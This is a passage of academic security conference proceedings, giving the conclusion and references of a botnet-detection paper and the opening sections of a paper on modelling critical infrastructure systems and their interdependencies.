Next steps will <strong>in</strong>clude the development of new robust application-oriented heuristics, the creation of an<br />
effective event drill-down algorithm with false positive rate reduction <strong>in</strong> m<strong>in</strong>d and, f<strong>in</strong>ally, a botnet host’s<br />
identification method based on such algorithms.<br />
The development of new tools and methods is also needed <strong>in</strong> order to allow real implementations of a<br />
system. The def<strong>in</strong>ed test bed and the tools used and developed (BotAnalytics, Reports and Analysis<br />
Services Projects) were important for off-l<strong>in</strong>e analysis and understand<strong>in</strong>g of the botnet traffic<br />
phenomenon but not quite efficient for real-time detection.<br />
Even if developed detection systems are not enough to stop botnet activity perhaps there will be a po<strong>in</strong>t<br />
<strong>in</strong> time where the <strong>in</strong>vestment made on build<strong>in</strong>g a botnet won’t payoff anymore. This is the greatest<br />
motivation of this research.<br />
192
Luís Mendonça and Henrique Santos<br />
In the end, it will be virtually impossible to detect a botnet whose bots mimic normal host behavior. But a<br />
bot behav<strong>in</strong>g as normal host can’t be that malicious.<br />
Acknowledgements<br />
This research has been possible thanks to the cooperation of the Communications Services of University<br />
of M<strong>in</strong>ho.<br />
References<br />
Akiyama, M., 2007. A proposal of metrics for botnet detection based on its cooperative behavior. 2007 International<br />
Symposium on Applications and the Internet Workshops (SAINTW’07).<br />
Bailey, M. et al., 2009. A survey of botnet technology and defenses. In Conference For Homeland <strong>Security</strong>, 2009.<br />
CATCH’09. Cybersecurity Applications & Technology. IEEE, p. 299–304.<br />
Choi, H., Lee, H. & Kim, H., 2007. Botnet detection by monitor<strong>in</strong>g group activities <strong>in</strong> DNS traffic. In Computer and<br />
Information Technology, 2007. CIT 2007. 7th IEEE International Conference on. IEEE, p. 715–720.<br />
Dagon, D. & Gu, G., 2007. A taxonomy of botnet structures. Twenty-Third Annual Computer <strong>Security</strong> Applications<br />
Conference (ACSAC 2007).<br />
Estrada, V.C. & Nakao, A., 2010. A Survey on the Use of Traffic Traces to Battle Internet Threats. 2010 Third<br />
International Conference on Knowledge Discovery and Data M<strong>in</strong><strong>in</strong>g on Knowledge Discovery and Data M<strong>in</strong><strong>in</strong>g.<br />
Flow-tools, 2010. Flow-tools project webpage. Available at: http://code.google.com/p/flow-tools/ [Accessed January<br />
3, 2011].<br />
Gu, G. et al., 2008. BotM<strong>in</strong>er: Cluster<strong>in</strong>g analysis of network traffic for protocol-and structure-<strong>in</strong>dependent botnet<br />
detection. In Proceed<strong>in</strong>gs of the 17th conference on <strong>Security</strong> symposium. USENIX Association, p. 139–154.<br />
Gu, G., Zhang, J. & Lee, W., 2008. BotSniffer: Detect<strong>in</strong>g botnet command and control channels <strong>in</strong> network traffic. In<br />
Proceed<strong>in</strong>gs of the 15th Annual Network and Distributed System <strong>Security</strong> Symposium (NDSS’08).<br />
Gu, Guofei et al., 2007. BotHunter: detect<strong>in</strong>g malware <strong>in</strong>fection through IDS-driven dialog correlation. In Proceed<strong>in</strong>gs<br />
of 16th USENIX <strong>Security</strong> Symposium on USENIX <strong>Security</strong> Symposium. Berkeley: USENIX Association, p.<br />
12:1–12:16.<br />
J<strong>in</strong>g, L. et al., 2009. Botnet: Classification, attacks, detection, trac<strong>in</strong>g, and preventive measures. EURASIP journal on<br />
wireless communications and network<strong>in</strong>g, 2009.<br />
Karasaridis, A., Rexroad, B. & Hoefl<strong>in</strong>, D., 2007. Wide-scale botnet detection and characterization. In Proceed<strong>in</strong>gs of<br />
the first conference on First Workshop on Hot Topics <strong>in</strong> Understand<strong>in</strong>g Botnets. USENIX Association, p. 7.<br />
Kim, I., Choi, H. & Lee, H., 2009. BotXrayer: Expos<strong>in</strong>g Botnets by Visualiz<strong>in</strong>g DNS Traffic.<br />
Lu, W. & Tavallaee, M., 2009. BotCop: An onl<strong>in</strong>e botnet traffic classifier. 2009 Seventh Annual Communications<br />
Networks and Services Research Conference.<br />
Microsoft, 2011a. Microsoft Analysis Services 2008. Available at:<br />
http://www.microsoft.com/sqlserver/2008/en/us/analysis-services.aspx [Accessed January 5, 2011].<br />
Microsoft, 2011b. Microsoft Report<strong>in</strong>g Services 2008. Available at:<br />
http://www.microsoft.com/sqlserver/2008/en/us/report<strong>in</strong>g.aspx [Accessed January 5, 2011].<br />
Microsoft, 2011c. Microsoft SQL Server 2008. Available at: http://www.microsoft.com/sqlserver/en/us/default.aspx<br />
[Accessed January 5, 2011].<br />
Mielke, C. & Chen, H., 2008. Botnets, and the cybercrim<strong>in</strong>al underground. In Intelligence and <strong>Security</strong> Informatics,<br />
2008. ISI 2008. IEEE International Conference on. IEEE, p. 206–211.<br />
Morales, J.A. et al., 2010. Analyz<strong>in</strong>g DNS activities of bot processes. In Malicious and Unwanted Software<br />
(MALWARE), 2009 4th International Conference on. IEEE, p. 98–103.<br />
Nfdump, 2010. Nfdump tools webpage. Available at: http://nfdump.sourceforge.net/ [Accessed January 3, 2011].<br />
Strayer, W.T. et al., 2008. Botnet detection based on network behavior. Botnet Detection, p.1–24.<br />
Tellenbach, B. et al., 2009. Beyond shannon: Characteriz<strong>in</strong>g <strong>in</strong>ternet traffic with generalized entropy metrics. Passive<br />
and Active Network Measurement.<br />
Villamar<strong>in</strong>-Salomón, R. & Brustoloni, J.C., 2008. Identify<strong>in</strong>g botnets us<strong>in</strong>g anomaly detection techniques applied to<br />
DNS traffic. In Consumer Communications and Network<strong>in</strong>g Conference, 2008. CCNC 2008. 5th IEEE. IEEE, p.<br />
476–481.<br />
Zhu, Z. et al., 2008. Botnet research survey. In Computer Software and Applications, 2008. COMPSAC’08. 32nd<br />
Annual IEEE International. IEEE, p. 967–972.<br />
193
Analysis and Modell<strong>in</strong>g of Critical Infrastructure Systems<br />
Graeme Pye and Matthew Warren<br />
Deak<strong>in</strong> University, Geelong, Australia<br />
graeme@deak<strong>in</strong>.edu.au<br />
mwarren@deak<strong>in</strong>.edu.au<br />
Abstract: The <strong>in</strong>creas<strong>in</strong>g complexity and <strong>in</strong>terconnectedness of critical <strong>in</strong>frastructure systems, <strong>in</strong>clud<strong>in</strong>g the<br />
<strong>in</strong>formation systems and communication networks that support their existence and functionality, poses questions and<br />
challenges. Particularly, <strong>in</strong> terms of modell<strong>in</strong>g and analysis of the security, survivability and ultimately reliability and<br />
cont<strong>in</strong>ued availability of critical <strong>in</strong>frastructure systems and the services they deliver to modern society. The focus of<br />
this research enquiry is with regard to critiqu<strong>in</strong>g and modell<strong>in</strong>g critical <strong>in</strong>frastructure systems. There are numerous<br />
systems analyse and modell<strong>in</strong>g approaches that outl<strong>in</strong>e any number of differ<strong>in</strong>g methodological approaches, each<br />
with their own characteristics, expertise, strengths and weaknesses. The <strong>in</strong>tention of this research is to <strong>in</strong>vestigate<br />
the merit of apply<strong>in</strong>g a ‘softer’ approach to critical <strong>in</strong>frastructure system security analysis and modell<strong>in</strong>g that broadly<br />
views the systems <strong>in</strong> holistic terms, <strong>in</strong>clud<strong>in</strong>g their relationships with other systems. The <strong>in</strong>tention is not to discuss or<br />
criticise exist<strong>in</strong>g research apply<strong>in</strong>g quantitative approaches, but to discuss a ‘softer’ system analysis and modell<strong>in</strong>g<br />
approach <strong>in</strong> a security context that is adaptable to analysis modell<strong>in</strong>g of critical <strong>in</strong>frastructure systems.<br />
Keywords: critical <strong>in</strong>frastructure, security analysis, systems modell<strong>in</strong>g<br />
1. Introduction<br />
The <strong>in</strong>teractive nature and characteristics of critical <strong>in</strong>frastructure systems presents several theoretical<br />
and practical challenges to modell<strong>in</strong>g, prediction, simulation and analysis of the causal behaviours and<br />
security factors both with<strong>in</strong> and between mixes of differ<strong>in</strong>g system types. Furthermore, understand<strong>in</strong>g the<br />
potential impacts of <strong>in</strong>terdependency relationships as <strong>in</strong>frastructures evolve and change <strong>in</strong> operational<br />
regulations govern<strong>in</strong>g critical <strong>in</strong>frastructure systems is an important consideration (Brown et al 2004). The<br />
<strong>in</strong>teractions and responses are neither universally applicable nor transferable between <strong>in</strong>dependent,<br />
s<strong>in</strong>gle critical <strong>in</strong>frastructure systems or <strong>in</strong>terconnected multiple system configurations. Critical<br />
<strong>in</strong>frastructure systems comprise a heterogeneous mixture of dynamic, <strong>in</strong>teractive, non-l<strong>in</strong>ear elements,<br />
unscheduled discont<strong>in</strong>uations and numerous other <strong>in</strong>fluential impositions and behaviours (Macdonald &<br />
Bologna 2003). These configurations and behaviours present significant challenges to the security<br />
analysis and modell<strong>in</strong>g of critical <strong>in</strong>frastructure systems.<br />
2. System analysis and modell<strong>in</strong>g considerations<br />
Systems generally consist of a collection of lower level elements or subsystems that work together <strong>in</strong> a<br />
cooperative manner toward the greater overarch<strong>in</strong>g goal of the system. Furthermore, the characteristics<br />
of systems vary considerably and are largely the result of the type of system, open or closed, and the<br />
external environment that <strong>in</strong>teracts and <strong>in</strong>fluences system functionality generally. Additionally, the<br />
relationships and <strong>in</strong>fluences exerted between subsystems also have a part to play <strong>in</strong> comprehend<strong>in</strong>g the<br />
subject system’s functionality and responses to differ<strong>in</strong>g circumstances.<br />
2.1 System modell<strong>in</strong>g themes<br />
In general terms, apply<strong>in</strong>g the system security analysis or system modell<strong>in</strong>g approaches to represent an<br />
<strong>in</strong>terpretive conceptualisation of a real-world system (Berntsen et al nd) provides a means of view<strong>in</strong>g the<br />
important aspects or essence of the system at various levels, depend<strong>in</strong>g on the particular system<br />
modell<strong>in</strong>g theme.<br />
For example, other common system modell<strong>in</strong>g and analysis themes are as follows (Avison 2003a):<br />
A three-level view, where the conceptual level is a descriptive high-level overview of the system<br />
doma<strong>in</strong>, the logical level describ<strong>in</strong>g the system goals and <strong>in</strong>tention, while the physical level describes<br />
the system itself <strong>in</strong>clud<strong>in</strong>g the technologies <strong>in</strong>volved.<br />
Process modell<strong>in</strong>g theme describes the logical analysis of the processes with<strong>in</strong> the system and is a<br />
discipl<strong>in</strong>e that applies a basic technique of functional decomposition, which breaks down a complex<br />
problem <strong>in</strong>to smaller, more manageable detail.<br />
Data analysis theme <strong>in</strong>volves comprehend<strong>in</strong>g and document<strong>in</strong>g the data elements and their<br />
relationships with<strong>in</strong> the system.<br />
194
Graeme Pye and Matthew Warren<br />
Object-orientated theme models objects that represent elements of the system <strong>in</strong>clud<strong>in</strong>g people,<br />
data, processes and the <strong>in</strong>teraction of these objects.<br />
These themes are each applicable to general system analysis or modell<strong>in</strong>g <strong>in</strong> the terms of their specific<br />
characteristics of application, however there is no s<strong>in</strong>gular theme directly applicable for critiqu<strong>in</strong>g and<br />
modell<strong>in</strong>g critical <strong>in</strong>frastructure systems.<br />
2.2 Blend<strong>in</strong>g methodological approaches<br />
As Avison (2003b) outl<strong>in</strong>es, methodologies provide a set detailed rules and guidel<strong>in</strong>es to follow and work<br />
to that deliver a highly structured design approach to the specific task they are to address. Therefore, <strong>in</strong><br />
the logical extension lies <strong>in</strong> utilis<strong>in</strong>g a number of <strong>in</strong>dividual themes or approaches <strong>in</strong> comb<strong>in</strong>ation, to br<strong>in</strong>g<br />
together characteristics of each specific method to provide specific expertise to meet the overall practical<br />
criteria and <strong>in</strong>tention of critiqu<strong>in</strong>g and modell<strong>in</strong>g of critical <strong>in</strong>frastructure systems (Wood-Harper et al<br />
1985).<br />
Therefore, a blended methodological approach utilis<strong>in</strong>g multiple system analysis and system modell<strong>in</strong>g<br />
approaches <strong>in</strong> comb<strong>in</strong>ation would conceivably br<strong>in</strong>g together the characteristics of each that is applicable<br />
to achiev<strong>in</strong>g the overall goal of critiqu<strong>in</strong>g and modell<strong>in</strong>g critical <strong>in</strong>frastructure systems.<br />
2.3 System analysis modell<strong>in</strong>g<br />
Other modell<strong>in</strong>g approaches related to <strong>in</strong>formation system analysis that Dennis et al (2009) discusses are<br />
as follows:<br />
Functional modell<strong>in</strong>g is a description of the processes and the <strong>in</strong>teraction of the system with its<br />
environment.<br />
Structural modell<strong>in</strong>g is a conceptual description of the structure of the data support<strong>in</strong>g the processes<br />
and presents the logical organisation of data without focuss<strong>in</strong>g on the technical details of how the<br />
data is stored, created or manipulated.<br />
Behavioural modell<strong>in</strong>g describes the <strong>in</strong>ternal dynamic aspects of a system that support the processes<br />
by describ<strong>in</strong>g the <strong>in</strong>ternal logic of the processes without specify<strong>in</strong>g the process implementation.<br />
While these approaches may not necessarily be directly applicable to this research, <strong>in</strong> terms of critiqu<strong>in</strong>g<br />
and modell<strong>in</strong>g critical <strong>in</strong>frastructure systems there are elements of these approaches that are<br />
complimentary to system analysis and the pr<strong>in</strong>ciples of system modell<strong>in</strong>g.<br />
The pr<strong>in</strong>ciple <strong>in</strong>tention of system security analysis is to determ<strong>in</strong>e an <strong>in</strong>tricate understand<strong>in</strong>g of the focal<br />
systems to identify and monitor potential system vulnerabilities and develop solutions. An additional<br />
approach to enhance the <strong>in</strong>sights ga<strong>in</strong>ed from system analysis <strong>in</strong>to the functional characteristics, security<br />
and structural features of systems is to develop a model of the subject system that conceptually<br />
represents the focal, real-world system of <strong>in</strong>terest for further <strong>in</strong>vestigation.<br />
3. Analysis and modell<strong>in</strong>g: The challenges<br />
The challenges of analys<strong>in</strong>g and modell<strong>in</strong>g such large-scale systems, <strong>in</strong>clud<strong>in</strong>g their dependency<br />
relationships with other systems and their non-l<strong>in</strong>ear and time-dependent behaviour, rema<strong>in</strong> largely<br />
undeterm<strong>in</strong>ed. Accord<strong>in</strong>g to McDonald and Bologna (2003), mathematical models of critical <strong>in</strong>frastructure<br />
systems are vague and there are no applicable methodologies for assess<strong>in</strong>g and comprehend<strong>in</strong>g the<br />
<strong>in</strong>tricacies of critical <strong>in</strong>frastructure systems. Add to this the effects of human <strong>in</strong>teraction, from both the<br />
perspective of a susceptibility to <strong>in</strong>stigate failure and adaptability to manage and recover wayward<br />
systems. This requires that modell<strong>in</strong>g these networked critical <strong>in</strong>frastructure systems is not only about<br />
modell<strong>in</strong>g the subject system itself, but <strong>in</strong>corporat<strong>in</strong>g consequential rationality of actual human th<strong>in</strong>k<strong>in</strong>g,<br />
responses and reactions, <strong>in</strong>clud<strong>in</strong>g the topology and dynamics of these large complex network systems<br />
(Macdonald & Bologna ibid, Peters et al 2008).<br />
Furthermore, there are additional complexity factors with network systems that are <strong>in</strong>herently difficult to<br />
comprehend (McDonald & Bologna 2003):<br />
Structural complexity – <strong>in</strong>creas<strong>in</strong>g number of nodes and l<strong>in</strong>ks between nodes;<br />
Network evolution – the structural l<strong>in</strong>kage which could change over time;<br />
195
Graeme Pye and Matthew Warren<br />
Connection diversity – the l<strong>in</strong>ks between nodes could have different weight<strong>in</strong>gs, directions or<br />
capacities;<br />
Dynamical complexity – the nodes could be non-l<strong>in</strong>ear dynamical systems;<br />
Node diversity – there could be many different node types; and<br />
Meta-complication – the various complications can <strong>in</strong>fluence other network nodes.<br />
Add to this the fact that critical <strong>in</strong>frastructures can be <strong>in</strong>tractable systems that are difficult to manage,<br />
operate and ma<strong>in</strong>ta<strong>in</strong> with large, physical and geographically distributed systems that are highly diverse.<br />
Typically consist<strong>in</strong>g of networked components or ‘systems with<strong>in</strong> systems’ structures and various<br />
performance variations; there are few modell<strong>in</strong>g mediums that can characterise these <strong>in</strong>frastructures as<br />
whole systems (Schulman & Roe 2007).<br />
However, critical <strong>in</strong>frastructure analysis and modell<strong>in</strong>g utilis<strong>in</strong>g simulation and optimisation-based<br />
techniques have played a significant part <strong>in</strong> exam<strong>in</strong><strong>in</strong>g potential <strong>in</strong>terdiction impacts, recognis<strong>in</strong>g the<br />
<strong>in</strong>sights they provide for mitigat<strong>in</strong>g facility loss and prioritis<strong>in</strong>g security strengthen<strong>in</strong>g efforts. Thus<br />
propos<strong>in</strong>g that simulation as an optimisation technique, has generally proven valuable <strong>in</strong> the analysis of<br />
vulnerabilities <strong>in</strong> critical <strong>in</strong>frastructure networks, system simulations can enable the exam<strong>in</strong>ation of a<br />
range of impacts, with either implicit or explicit notions of optimis<strong>in</strong>g performance (Murray & Grubesic<br />
2007). Therefore, <strong>in</strong> the context of assess<strong>in</strong>g system potentiality, reliability and vulnerability through<br />
monitor<strong>in</strong>g the simulation models of networks as nodes or l<strong>in</strong>ks that are compromised, enables<br />
correspond<strong>in</strong>g changes <strong>in</strong> connectivity or performance to be documented.<br />
A f<strong>in</strong>al important consideration for modell<strong>in</strong>g critical <strong>in</strong>frastructure systems is the <strong>in</strong>terdependency<br />
relationships that exist between differ<strong>in</strong>g critical <strong>in</strong>frastructure systems. Muss<strong>in</strong>gton (2002) identifies<br />
these relationships as a po<strong>in</strong>t at which a shortfall of knowledge for improv<strong>in</strong>g critical <strong>in</strong>frastructure<br />
security capabilities is <strong>in</strong>complete and suggests that part of the problem is the complexity of relationships<br />
that is difficult to model. However, Brown et al (2004) recognises that modell<strong>in</strong>g is a first step <strong>in</strong><br />
analys<strong>in</strong>g, identify<strong>in</strong>g and answer<strong>in</strong>g persistent questions about the potential of ‘real’ critical <strong>in</strong>frastructure<br />
system vulnerabilities.<br />
For example, modell<strong>in</strong>g critical <strong>in</strong>frastructure systems and the dependent and <strong>in</strong>terdependent<br />
relationships or <strong>in</strong>fluences between <strong>in</strong>frastructures can deliver structural <strong>in</strong>sight. Pederson et al (2006)<br />
provides a representation of differ<strong>in</strong>g <strong>in</strong>frastructures and their <strong>in</strong>terdependent relationships and likely<br />
response connections based on a flood<strong>in</strong>g event scenario that draws a parallel with Hurricane Katr<strong>in</strong>a <strong>in</strong><br />
New Orleans. In Figure 1 the <strong>in</strong>dividual <strong>in</strong>frastructure networks are represented on a s<strong>in</strong>gle plane and the<br />
parallel l<strong>in</strong>es with<strong>in</strong> each plane represent sectors and sub sectors with<strong>in</strong> that particular <strong>in</strong>frastructure. The<br />
spheres or nodes represent key <strong>in</strong>frastructure components with<strong>in</strong> that sector; for <strong>in</strong>stance, the energy<br />
sector conta<strong>in</strong>s electricity generation and distribution and natural gas production and distribution.<br />
Dependencies can exist with<strong>in</strong> each <strong>in</strong>frastructure and between differ<strong>in</strong>g <strong>in</strong>ternal sectors. The solid l<strong>in</strong>es<br />
cross<strong>in</strong>g sectors with<strong>in</strong> a specific <strong>in</strong>frastructure represent <strong>in</strong>ternal dependencies and the broken l<strong>in</strong>es<br />
between different <strong>in</strong>frastructures represent dependencies that can also exist between different<br />
<strong>in</strong>frastructures or <strong>in</strong>frastructure <strong>in</strong>terdependencies.<br />
Figure 1 illustrates where the dependencies and <strong>in</strong>terdependencies exist with<strong>in</strong> the greater <strong>in</strong>frastructure<br />
system and highlights where dependency relationships exist and the <strong>in</strong>herent and potential complexity<br />
these relationships br<strong>in</strong>g to <strong>in</strong>frastructures. Additionally, a model of this nature enables those attempt<strong>in</strong>g<br />
to manage the chaotic environments of disasters and emergency response dur<strong>in</strong>g catastrophic events to<br />
ga<strong>in</strong> a clear appreciation for where these relationships exist both with<strong>in</strong> and between critical <strong>in</strong>frastructure<br />
systems. Understand<strong>in</strong>g this is important for emergency response decision-makers and agencies<br />
responsible for recovery, rescue and restoration purposes because a failure to understand these<br />
dynamics would result <strong>in</strong> poor coord<strong>in</strong>ation and an <strong>in</strong>effective response. Thereby, result<strong>in</strong>g <strong>in</strong> the<br />
mismanagement of resources, <strong>in</strong>clud<strong>in</strong>g supplies, rescue personnel and security teams that may<br />
generate a loss of public confidence or trust and at worst, loss of human life (Brown et al 2004, Pederson<br />
et al 2006).<br />
The analysis and modell<strong>in</strong>g of critical <strong>in</strong>frastructure systems also offers the potential to determ<strong>in</strong>e<br />
<strong>in</strong>terdependencies that are susceptible to cascad<strong>in</strong>g failures and identify<strong>in</strong>g the divergent systems<br />
characteristics likely to exacerbate such <strong>in</strong>terconnected <strong>in</strong>frastructure failures. Particularly, where the<br />
consumption of services is virtually immediate and no buffer<strong>in</strong>g or reserve of resources exists with<strong>in</strong><br />
196
Graeme Pye and Matthew Warren<br />
<strong>in</strong>frastructures such as telecommunications and electricity grids, this immediacy of resource consumption<br />
can lead to potentially <strong>in</strong>stantaneous cascad<strong>in</strong>g failures that impact across <strong>in</strong>terdependent critical<br />
<strong>in</strong>frastructure systems. Alternatively, other <strong>in</strong>frastructures that exhibit buffer<strong>in</strong>g characteristics similar to<br />
fuel and gas production and distribution <strong>in</strong>frastructures that supply physical resources have a level of<br />
reserve with<strong>in</strong> these systems where any failure would not necessarily be <strong>in</strong>stantaneous <strong>in</strong> its effect, but<br />
the effects would exacerbate over time (Svendsen & Wolthusen 2007). These differences <strong>in</strong> scenario<br />
circumstances and the characteristics of the critical <strong>in</strong>frastructure systems <strong>in</strong>volved would by necessity<br />
require careful consideration <strong>in</strong> a modell<strong>in</strong>g context. Particularly, when seek<strong>in</strong>g to identify, predict and<br />
even quantify the effects of cascad<strong>in</strong>g <strong>in</strong>cidents among <strong>in</strong>terdependent <strong>in</strong>frastructure systems. This would<br />
add <strong>in</strong>formative value with regard to develop<strong>in</strong>g public policies that aim to address critical <strong>in</strong>frastructure<br />
vulnerabilities and especially those that relate to critical <strong>in</strong>frastructure system security (Zimmerman &<br />
Restrepo 2006).<br />
Figure 1: Infrastructure <strong>in</strong>terdependencies (Pederson et al 2006)<br />
As an alternative approach, Little (2003) suggests that apply<strong>in</strong>g analysis and modell<strong>in</strong>g techniques to<br />
historical critical <strong>in</strong>frastructure <strong>in</strong>cidents and events would enable <strong>in</strong>cremental improvements <strong>in</strong><br />
prediction, forecast<strong>in</strong>g and preparedness for future events and allows the <strong>in</strong>stigation of new eng<strong>in</strong>eer<strong>in</strong>g<br />
approaches to design and construction. Thus, enabl<strong>in</strong>g critical <strong>in</strong>frastructure systems to become more<br />
robust and better able to withstand and cope with the rigours of natural hazards, crippl<strong>in</strong>g failures,<br />
accidents and <strong>in</strong>cidents as they occur <strong>in</strong> the future.<br />
Due to the <strong>in</strong>creas<strong>in</strong>g importance of secure critical <strong>in</strong>frastructure systems, there is an effort to develop<br />
analysis and modell<strong>in</strong>g approaches that can accurately model critical <strong>in</strong>frastructure system behaviour,<br />
identify <strong>in</strong>terdependencies and vulnerabilities to various threats. Some of the potential outcomes of<br />
analysis and modell<strong>in</strong>g simulation approaches to assess<strong>in</strong>g critical <strong>in</strong>frastructure systems may prove<br />
beneficial to governments, government agencies, military plann<strong>in</strong>g and defence, community expansion<br />
plans. This would reduce costs, enhance critical system redundancy, improve traffic flow, secure data<br />
and <strong>in</strong>formation protection and better prepare for and respond to emergencies (Pederson et al 2006).<br />
Although <strong>in</strong> the context of Australian critical <strong>in</strong>frastructure system characteristics, there are modell<strong>in</strong>g<br />
considerations that are particular to the subject critical <strong>in</strong>frastructure systems’ relevant environment.<br />
197
Graeme Pye and Matthew Warren<br />
4. Critical <strong>in</strong>frastructure system modell<strong>in</strong>g considerations<br />
In briefly discuss<strong>in</strong>g and identify<strong>in</strong>g the generic characteristics of Australian critical <strong>in</strong>frastructure systems,<br />
the follow<strong>in</strong>g outl<strong>in</strong>es the specific modell<strong>in</strong>g considerations required for representational modell<strong>in</strong>g of<br />
critical <strong>in</strong>frastructure systems, circumstances and their attributes (Pye & Warren 2008):<br />
Systematic scop<strong>in</strong>g perspective of the system to be modelled or part thereof and granularity detail of<br />
hierarchal levels with<strong>in</strong> the subject system;<br />
Identify<strong>in</strong>g system criticalness and po<strong>in</strong>ts of criticalness with the subject system;<br />
Systems are generally transitional (services move from source to dest<strong>in</strong>ation);<br />
Systems are distributed <strong>in</strong> character;<br />
Systems operate autonomously or semi-autonomous (typically no central control for cooperat<strong>in</strong>g<br />
subsystems);<br />
Deadlock<strong>in</strong>g issues (transport, communication);<br />
System scalability (systems made up of subsystems) and complexity;<br />
Network connected systems (stand-alone) systems and the relationships (dependency and<br />
<strong>in</strong>terdependency);<br />
Operational factors and environmental <strong>in</strong>fluences (<strong>in</strong>ternal and external);<br />
System redundancy and backup systems;<br />
Control and communication (critical pathways, <strong>in</strong>ternet);<br />
Time (temporal) scale dynamics with<strong>in</strong> and around systems;<br />
Depict ‘cause and effect’ and possible dynamic changes with<strong>in</strong> system/s; and<br />
System concurrency issues.<br />
The ability to model these systems (<strong>in</strong>corporat<strong>in</strong>g the considerations above) <strong>in</strong> a relevant context is<br />
important to assess<strong>in</strong>g system security, understand<strong>in</strong>g functionality and dynamic behaviours <strong>in</strong> order to<br />
develop strategies that address and ma<strong>in</strong>ta<strong>in</strong> the cont<strong>in</strong>uity of service. This <strong>in</strong> part relies upon identify<strong>in</strong>g<br />
and protect<strong>in</strong>g key po<strong>in</strong>ts of <strong>in</strong>frastructure system concentration, p<strong>in</strong>ch or choke po<strong>in</strong>ts and remote<br />
exposures <strong>in</strong> order to ma<strong>in</strong>ta<strong>in</strong> high-levels of service assurance, cont<strong>in</strong>uity, system availability and short<br />
system restoration times.<br />
5. System modell<strong>in</strong>g pr<strong>in</strong>ciples<br />
The overarch<strong>in</strong>g pr<strong>in</strong>ciple applied to system modell<strong>in</strong>g should <strong>in</strong>corporate a ‘keep it simple’ approach for<br />
the development of such system models. This is important because of the highly complex nature of<br />
critical <strong>in</strong>frastructure systems and the system model must rema<strong>in</strong> representative of the system to enable<br />
security po<strong>in</strong>ts with<strong>in</strong> the system to become visible. To achieve this and rema<strong>in</strong> consistent <strong>in</strong> application,<br />
the follow<strong>in</strong>g fundamental modell<strong>in</strong>g pr<strong>in</strong>ciples represent an attempt to focus on the consistent application<br />
of modell<strong>in</strong>g techniques as applied to critical <strong>in</strong>frastructure systems (Pye & Warren 2007).<br />
The research of Pidd (1996) developed five desirable and simple pr<strong>in</strong>ciples to apply to the development<br />
of discrete computer simulations or <strong>in</strong> the use of programm<strong>in</strong>g language; similarly these same pr<strong>in</strong>ciples<br />
can also be adapted and utilised as guides to the development of critical <strong>in</strong>frastructure system models, as<br />
follows (ibid):<br />
Model Simple, Th<strong>in</strong>k Complicated. This identifies that the modeller must keep <strong>in</strong> m<strong>in</strong>d that the model<br />
itself is a tool to support and extend the th<strong>in</strong>k<strong>in</strong>g, impressions and conceptual understand<strong>in</strong>g of the<br />
physical system as a model. Therefore the avoidance of additional complexity and need for clear<br />
physical system boundaries are established for the system model.<br />
Be Parsimonious, Start Simple and Add. The problem with the previous pr<strong>in</strong>ciple is identify<strong>in</strong>g where<br />
the balance lies between simplicity and complexity. There is no general answer to this problem, but a<br />
solution lays <strong>in</strong> adopt<strong>in</strong>g a ‘prototyp<strong>in</strong>g approach’ where the gradual development of the model starts<br />
out with simple assumptions and by only add<strong>in</strong>g further complexity as it becomes necessary.<br />
However this does require cont<strong>in</strong>ued ref<strong>in</strong>ement and revision to avoid add<strong>in</strong>g unnecessary<br />
complexity to the model.<br />
198
Graeme Pye and Matthew Warren<br />
Divide and Conquer, Avoid Mega-models. This is common advice given to those deal<strong>in</strong>g with a<br />
complex problem, the aim be<strong>in</strong>g to breakdown the problem by decomposition of the system <strong>in</strong>to<br />
manageable component parts that apply the previous pr<strong>in</strong>ciple to develop the system model.<br />
Do Not Fall <strong>in</strong> Love with Data. The model should drive the data collection, not the other way round,<br />
and this requires the modeller to develop ideas for the model and its parameters from a selective<br />
perspective of what data types are collected, analysed, <strong>in</strong>terpreted and implemented <strong>in</strong>to the model<br />
together with a feedback test<strong>in</strong>g regime to test the model developed.<br />
Model Build<strong>in</strong>g May Feel Like Modell<strong>in</strong>g Through. As the model is an attempt to represent part of<br />
reality or an action taken or to <strong>in</strong>crease understand<strong>in</strong>g, the consideration rema<strong>in</strong>s that the model at<br />
some po<strong>in</strong>t becomes the best representation it can be and cont<strong>in</strong>ued ‘muddl<strong>in</strong>g’ with the model can<br />
be detrimental to assumptions based on the completed model.<br />
These modell<strong>in</strong>g guides adapted from Pidd’s (1996) work illustrate some key po<strong>in</strong>ts of reference that<br />
attempt to ma<strong>in</strong>ta<strong>in</strong> consistency when develop<strong>in</strong>g, analys<strong>in</strong>g, and implement<strong>in</strong>g models with<strong>in</strong> the realm<br />
of modell<strong>in</strong>g of critical <strong>in</strong>frastructure systems. This will assist the modeller to (Pye & Warren 2007):<br />
Categorise and develop an understand<strong>in</strong>g of the problem context for modell<strong>in</strong>g;<br />
Decide on the model structure based on analys<strong>in</strong>g the available data;<br />
Determ<strong>in</strong>e model realisation of where the parameters of the model have been established;<br />
Identify a model assessment as the po<strong>in</strong>t at which the model is deemed acceptable, valid and usable<br />
as a system model that reflects normal functionality; and<br />
Apply model implementation, by utilis<strong>in</strong>g the model to ga<strong>in</strong> valuable predictive data and likely system<br />
scenario responses.<br />
These system modell<strong>in</strong>g pr<strong>in</strong>ciples offer common sense guidel<strong>in</strong>es that are applicable to modell<strong>in</strong>g critical<br />
<strong>in</strong>frastructure systems and deal<strong>in</strong>g with the complexities of the characteristics <strong>in</strong>cumbent of critical<br />
<strong>in</strong>frastructure systems.<br />
6. Conceptual system modell<strong>in</strong>g objectives<br />
Furthermore <strong>in</strong> conceptually modell<strong>in</strong>g critical <strong>in</strong>frastructure systems, there are system modell<strong>in</strong>g<br />
objectives that provide deliverable <strong>in</strong>sights <strong>in</strong>to critical <strong>in</strong>frastructure systems through their modell<strong>in</strong>g.<br />
This should strive to deliver from the perspective of system functionality, security characteristics and<br />
dynamic behaviour, but not limited to the follow<strong>in</strong>g (CIPMA 2007):<br />
Identify system scope, <strong>in</strong>terconnections between systems both with<strong>in</strong> and across critical<br />
<strong>in</strong>frastructure sectors <strong>in</strong>corporat<strong>in</strong>g levels of scale and future system scalability;<br />
Deliver <strong>in</strong>sights <strong>in</strong>to the system behaviours and responses of complex networks and their<br />
communication, control and service provision dynamics;<br />
Identify and analyse the extent and <strong>in</strong>fluential magnitude of relationships between cooperat<strong>in</strong>g<br />
systems, particularly from the aspect of dependency and <strong>in</strong>terdependency relationships;<br />
Observe through applied modell<strong>in</strong>g, normal system functionality and predict the potential flow-on<br />
effects of critical <strong>in</strong>frastructure system failure and likely cascad<strong>in</strong>g impacts;<br />
